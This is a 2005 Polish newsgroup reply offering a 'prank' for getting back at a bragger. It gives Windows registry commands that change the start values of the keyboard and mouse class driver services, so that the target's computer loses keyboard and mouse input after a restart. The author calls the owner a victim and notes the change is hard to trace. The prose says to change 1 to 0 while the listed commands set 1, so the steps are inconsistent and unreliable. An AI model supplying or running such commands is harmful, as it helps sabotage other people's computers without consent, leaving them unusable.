Re: Jak utrzec nosa chwalipiecie ?

Autor: Mariusz <mariusz28lat_at_op.pl>
Data: Fri 26 Aug 2005 - 16:37:53 MET DST

no dobra tutaj

W podanych kluczach zmieniamy 1 na 0.
Efekt będzie widoczny po restarcie tak więc ofiara nie będzie wiedzieć kiedy

zostały dodakonane zmiany (no chyba ze inspekcja włączona albo inne cudo)
po restarcie nie wazne w jakim trybie nie widzi klawiatury, myszki totalny
"zonk"
pomaga podłączenie się przez sieć do rejestru i przywrócenie ustawień
restart i komputer znowu działa...

Jak pierwszy raz mi ktoś zrobił tego psikusa to koszmar,
oczywiscie reinstalacja stacji, wczesniej podmiana klawiatury ;-) myszki ;-)
a moze poprostu jestem słaby i nie wiedziałem jak sobie inaczej z tym
poradzić...

@reg update "HKLM\SYSTEM\CurrentControlSet\Services\kbdclass\start=1"
@reg update "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\start=1"
@reg update "HKLM\SYSTEM\CurrentControlSet\Services\lkbdfltr\start=1"